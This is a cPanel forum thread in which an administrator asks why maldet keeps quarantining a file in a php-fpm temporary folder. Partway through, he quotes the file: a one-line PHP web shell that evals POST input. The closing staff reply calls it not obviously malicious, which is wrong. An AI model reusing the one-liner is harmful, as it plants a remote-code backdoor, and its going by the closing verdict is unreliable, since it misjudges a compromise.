Malware tmp folder

[Gojko]

I get this from maldet one in month. Any one now what is this? If is dangerous how to prevent?
I have last cPanel (no 3rd party software) and last kernel so system is updated.

FILE HIT LIST:
{HEX}php.malware.fopo.538 : /tmp/systemd-private-11cbc4cb89194d10b68f70c00007011e-ea-php56-php-fpm.service-St7D8B/tmp/phpYRhpBm => /usr/local/maldetect/quarantine/phpYRhpBm.706132374

 

[24x7server]

Hi,

Check which user has uploaded this file. The user data may be infected causing this to occur..

# ls -l /tmp/systemd-private-11cbc4cb89194d10b68f70c00007011e-ea-php56-php-fpm.service-St7D8B/tmp/phpYRhpBm
OR
check the maldet session logs to check when it was quarantined and what process recalled it..

 

[cPanelMichael]

Hello,

Let us know if the previous post helps. Note that Maldet is a third-party application, so you may want to reach out to a system administrator for additional assistance if you don't receive additional user-feedback on this thread:

System Administration Services | cPanel Forums

Thank you.

 

[Gojko]

Hello, thank you for answer. Session log show only what is in report i check it with "maldet -l".
That folder don't exist because i have enabled quarantine so message is: No such file or directory.
Any other suggestions?

 

[cPanelMichael]

That folder don't exist because i have enabled quarantine

Hello,

Does the file exist in the /usr/local/maldetect/quarantine directory? If so, you could view the file to verify it's contents to see if it's legitimate. Note, if it's detecting "/usr/lib/systemd/system/ea-php56-php-fpm.service", here's how the contents of that file should look:

# cat /usr/lib/systemd/system/ea-php56-php-fpm.service
[Unit]
Description=The PHP FastCGI Process Manager
After=syslog.target network.target network-online.target

[Service]
Type=notify
PIDFile=/opt/cpanel/ea-php56/root/usr/var/run/php-fpm/php-fpm.pid
EnvironmentFile=/opt/cpanel/ea-php56/root/etc/sysconfig/php-fpm
ExecStart=/opt/cpanel/ea-php56/root/usr/sbin/php-fpm --nodaemonize
ExecReload=/bin/kill -USR2 $MAINPID
PrivateTmp=true

[Install]
WantedBy=multi-user.target

Thank you.

 

[Gojko]

Actually no, in quarantine there is no file/folders like that. I will check next time (because it happens couple times in month) directly in quarantine and update this threads.

 

[Gojko]

Hello. content of one of them is:

8D9AAC4D8E44392996B8CDF782<?php  @eval($_POST['xbcmd']); die();?>

second:

# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
CPANELACCOUNT:CPANELACCOUNT:600:71:0e95b1762b4f353bec9209d75350:1523196703:1523196508:1523196508:/tmp/systemd-private-21c4a2923244dbbd6c0543722c8f4-ea-php56-php-fpm.service-SBugLp/tmp/phpZRL1RW

maldet:

maldet(20913): {scan} scan completed on /home/CPANELACCOUNT: files 3076, malware hits 0, cleaned hits 0, time 44s

cat /usr/lib/systemd/system/ea-php56-php-fpm.service
[Unit]
Description=The PHP FastCGI Process Manager
After=syslog.target network.target network-online.target securetmp.service

[Service]
Type=notify
PIDFile=/opt/cpanel/ea-php56/root/usr/var/run/php-fpm/php-fpm.pid
EnvironmentFile=/opt/cpanel/ea-php56/root/etc/sysconfig/php-fpm
ExecStart=/opt/cpanel/ea-php56/root/usr/sbin/php-fpm --nodaemonize
ExecReload=/bin/kill -USR2 $MAINPID
PrivateTmp=true
LimitNOFILE=infinity

[Install]
WantedBy=multi-user.target

 

[cPanelMichael]

Hello,

The contents of the /usr/lib/systemd/system/ea-php56-php-fpm.service file that you provided match what I see on a test system. However, I believe you are referring to the contents of the PHP file in the /tmp directory. I don't see any obvious signs of malicious intent based on the information you provided, but you may want to reach out to a system administrator for additional assistance if want a more in-depth investigation:

System Administration Services | cPanel Forums

Thank you.